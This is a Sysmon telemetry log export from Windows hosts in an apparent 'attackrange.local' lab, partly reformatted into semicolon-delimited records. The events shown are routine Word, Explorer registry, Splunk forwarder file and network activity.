19:19:11.273{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\3348 12241200x80000000000000001606876Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-DeleteValue2021-04-21 19:19:11.273{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\3348\0 13241300x80000000000000001606875Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 
19:19:11.273{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\Common\GracefulExit\WINWORD\3348\0Binary Data 12241200x80000000000000001606874Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:11.273{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\Common\GracefulExit\WINWORD\3348 23542300x80000000000000001606873Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:11.273{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\winword.exe.db-walMD5=5D28C7DCB62E9C29C68E6577E82AAE37,SHA256=71BFB6BA45A8FA9603753D727364471B7D7226BB46051884A8D6B60E4DEDB6D1falsefalse - insufficient disk space 23542300x80000000000000001606872Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:11.273{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\winword.exe.db-shmMD5=D70DA974B87C93303CD6ED1520C9577D,SHA256=692E6DB71F536F6B23028CB7BD31B0017581BB4869B123E3AD15234DFC33CF0Cfalsefalse - insufficient disk space 11241100x80000000000000001606890Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:12.914{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606889Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:12.914{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABFC382821E26845452A90361329B47E,SHA256=F048D95B70C89F081E0A14B99733450EFB7BC68086A7BCD0FA81D011EF09D0EAfalsefalse - insufficient disk space 10341000x80000000000000001095432Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:12.481{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095431Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:12.481{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095430Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:12.328{761B69BB-820D-607D-D800-00000000BA01}1064NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B211E02C89B056D090F473708FEE3DB4,SHA256=ADB34D20583A48866279A1707FCDB0441E2E5C04B76CEEB0BBA1B8DB2A2A619A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095429Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:12.149{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D07DC732F1B272B8D72BB1745B9F9BFD,SHA256=5D39B3CBCC801E2E7205BDCBF9B6463A5076AA132606A3F1A77F7BB95F795D72,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001606888Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.799{21761711-65C9-6080-565E-00000000BB01}3348self.events.data.microsoft.com0type: 5 self-events-data.trafficmanager.net;type: 5 skypedataprdcoleus03.cloudapp.net;::ffff:52.114.132.23;C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE 13241300x80000000000000001606887Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:12.676{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 11241100x80000000000000001606886Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:12.059{21761711-83AE-607D-1100-00000000BB01}968C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat2021-04-19 13:20:46.436 23542300x80000000000000001606885Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:12.059{21761711-83AE-607D-1100-00000000BB01}968NT AUTHORITY\LOCAL 
SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=7954826F946673ABBC089F26389AEE94,SHA256=B95DD14BCA5D3C40A273D2B9D3FEB217C0FBA931D75D658043ADCDCC9649BFCCfalsefalse - insufficient disk space 12241200x80000000000000001606932Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:13.999{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 13241300x80000000000000001606931Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.999{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListExBinary Data 13241300x80000000000000001606930Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.999{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlotsBinary Data 12241200x80000000000000001606929Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:13.999{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 12241200x80000000000000001606928Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:13.999{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU 12241200x80000000000000001606927Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 
19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 13241300x80000000000000001606926Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListExBinary Data 12241200x80000000000000001606925Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 13241300x80000000000000001606924Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlotsBinary Data 12241200x80000000000000001606923Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU 12241200x80000000000000001606922Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 13241300x80000000000000001606921Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 
Sysmon records (channel Microsoft-Windows-Sysmon/Operational, Keywords 0x8000000000000000 on every record; RuleName is "-" i.e. unset on every record and is omitted). One record per line, fields separated by " ; ", in the order exported. Field order by EventID:
  3  NetworkConnect : EventID ; RecordID ; Computer ; UtcTime ; ProcessGuid ; PID ; Image ; User ; Protocol ; Initiated ; SrcIsIPv6 ; SrcIp ; SrcHostname ; SrcPort ; SrcPortName ; DstIsIPv6 ; DstIp ; DstHostname ; DstPort ; DstPortName
  7  ImageLoad      : EventID ; RecordID ; Computer ; UtcTime ; ProcessGuid ; PID ; Image ; ImageLoaded ; FileVersion ; Description ; Product ; Company ; OriginalFileName ; Hashes ; Signed ; Signature ; SignatureStatus
  10 ProcessAccess  : EventID ; RecordID ; Computer ; UtcTime ; SourceProcessGuid ; SourcePID ; SourceTID ; SourceImage ; TargetProcessGuid ; TargetPID ; TargetImage ; GrantedAccess ; CallTrace
  11 FileCreate     : EventID ; RecordID ; Computer ; UtcTime ; ProcessGuid ; PID ; Image ; TargetFilename ; CreationUtcTime
  12 RegistryEvent  : EventID ; RecordID ; Computer ; EventType ; UtcTime ; ProcessGuid ; PID ; Image ; TargetObject
  13 RegistryEvent  : EventID ; RecordID ; Computer ; EventType ; UtcTime ; ProcessGuid ; PID ; Image ; TargetObject ; Details
  23 FileDelete     : EventID ; RecordID ; Computer ; UtcTime ; ProcessGuid ; PID ; User ; Image ; TargetFilename ; Hashes ; IsExecutable ; Archived

(continuation of the record begun on the preceding line) 19:19:13.998 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx ; Binary Data
12 ; 1606920 ; win-host-5.attackrange.local ; CreateKey ; 2021-04-21 19:19:13.998 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0
13 ; 1606919 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:13.998 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots ; Binary Data
12 ; 1606918 ; win-host-5.attackrange.local ; CreateKey ; 2021-04-21 19:19:13.998 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
13 ; 1606917 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:13.998 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection ; DWORD (0x00000001)
13 ; 1606916 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:13.998 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID ; DWORD (0x00000002)
13 ; 1606915 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:13.998 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID ; {30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}
13 ; 1606914 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:13.998 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView ; DWORD (0xffffffff)
13 ; 1606913 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:13.998 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo ; Binary Data
13 ; 1606912 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:13.998 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort ; Binary Data
13 ; 1606911 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:13.998 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize ; DWORD (0x00000030)
13 ; 1606910 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:13.998 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags ; DWORD (0x41200011)
13 ; 1606909 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:13.998 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode ; DWORD (0x00000002)
13 ; 1606908 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:13.998 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode ; DWORD (0x00000006)
13 ; 1606907 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:13.998 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid ; {65F125E5-7BE1-4810-BA9D-D271C8432CE3}
13 ; 1606906 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:13.998 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags ; DWORD (0x41200001)
13 ; 1606905 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:13.998 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Rev ; DWORD (0x00000000)
12 ; 1606904 ; win-host-5.attackrange.local ; CreateKey ; 2021-04-21 19:19:13.998 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}
12 ; 1606903 ; win-host-5.attackrange.local ; CreateKey ; 2021-04-21 19:19:13.998 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1
13 ; 1606902 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:13.998 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx ; Binary Data
12 ; 1606901 ; win-host-5.attackrange.local ; CreateKey ; 2021-04-21 19:19:13.998 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1
13 ; 1606900 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:13.997 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots ; Binary Data
12 ; 1606899 ; win-host-5.attackrange.local ; CreateKey ; 2021-04-21 19:19:13.997 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
11 ; 1606898 ; win-host-5.attackrange.local ; 2021-04-21 19:19:13.917 ; {21761711-8437-607D-CE00-00000000BB01} ; 2032 ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; 2021-04-19 13:21:25.072
23 ; 1606897 ; win-host-5.attackrange.local ; 2021-04-21 19:19:13.917 ; {21761711-8437-607D-CE00-00000000BB01} ; 2032 ; NT AUTHORITY\SYSTEM ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; MD5=5366E31C4823D76F479B614EF7CD55F4,SHA256=6FFCB4E270500F2E7E864991587CBBAD2448AE92B50D302F738A3B1329177D74 ; false ; false - insufficient disk space
10 ; 1095435 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:13.482 ; {761B69BB-818C-607D-0C00-00000000BA01} ; 844 ; 972 ; C:\Windows\system32\svchost.exe ; {761B69BB-84E2-607D-1F03-00000000BA01} ; 5220 ; C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe ; 0x3600 ; C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10 ; 1095434 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:13.482 ; {761B69BB-818C-607D-0C00-00000000BA01} ; 844 ; 972 ; C:\Windows\system32\svchost.exe ; {761B69BB-84E4-607D-2203-00000000BA01} ; 5440 ; C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe ; 0x3600 ; C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23 ; 1095433 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:13.154 ; {761B69BB-820D-607D-D800-00000000BA01} ; 1064 ; NT AUTHORITY\SYSTEM ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; MD5=2BFCBB7E9688591B14047CA47882DE2F,SHA256=8B8BE9412A26E69C8E59DFDB776DD2CE8FC04349B60D4B026AC9EFD37FAA7F31,IMPHASH=00000000000000000000000000000000 ; false ; true
13 ; 1606896 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:13.816 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBA ; Binary Data
13 ; 1606895 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:13.816 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.Rkcybere ; Binary Data
3 ; 1606894 ; win-host-5.attackrange.local ; 2021-04-21 19:19:11.643 ; {21761711-8431-607D-C500-00000000BB01} ; 3840 ; C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe ; NT AUTHORITY\SYSTEM ; tcp ; true ; false ; 10.0.1.15 ; win-host-5.attackrange.local ; 49742 ; - ; false ; 10.0.1.12 ; ip-10-0-1-12.us-west-2.compute.internal ; 8000 ; -
3 ; 1606893 ; win-host-5.attackrange.local ; 2021-04-21 19:19:10.520 ; {21761711-65C9-6080-565E-00000000BB01} ; 3348 ; C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE ; WIN-HOST-5\Administrator ; tcp ; true ; false ; 10.0.1.15 ; win-host-5.attackrange.local ; 49740 ; - ; false ; 52.114.132.23 ; - ; 443 ; https
11 ; 1606892 ; win-host-5.attackrange.local ; 2021-04-21 19:19:13.195 ; {21761711-8437-607D-CE00-00000000BB01} ; 2032 ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security ; 2021-04-19 13:20:22.616
23 ; 1606891 ; win-host-5.attackrange.local ; 2021-04-21 19:19:13.195 ; {21761711-8437-607D-CE00-00000000BB01} ; 2032 ; NT AUTHORITY\SYSTEM ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security ; MD5=884E0949FE3E560D911A9BB36B904233,SHA256=F2DA3A9EB95547A6ECBA14325D7CD02565E486D1F6719F82A91544C1BF18DD5C ; false ; false - insufficient disk space
13 ; 1606954 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:14.217 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\NavPane\ExpandedState ; Binary Data
12 ; 1606953 ; win-host-5.attackrange.local ; CreateKey ; 2021-04-21 19:19:14.217 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\NavPane
13 ; 1606952 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:14.217 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\NavPane\ExpandedState ; Binary Data
12 ; 1606951 ; win-host-5.attackrange.local ; CreateKey ; 2021-04-21 19:19:14.217 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\NavPane
13 ; 1606950 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:14.217 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\GlobalSettings\ProperTreeModuleInner\ProperTreeModuleInner ; Binary Data
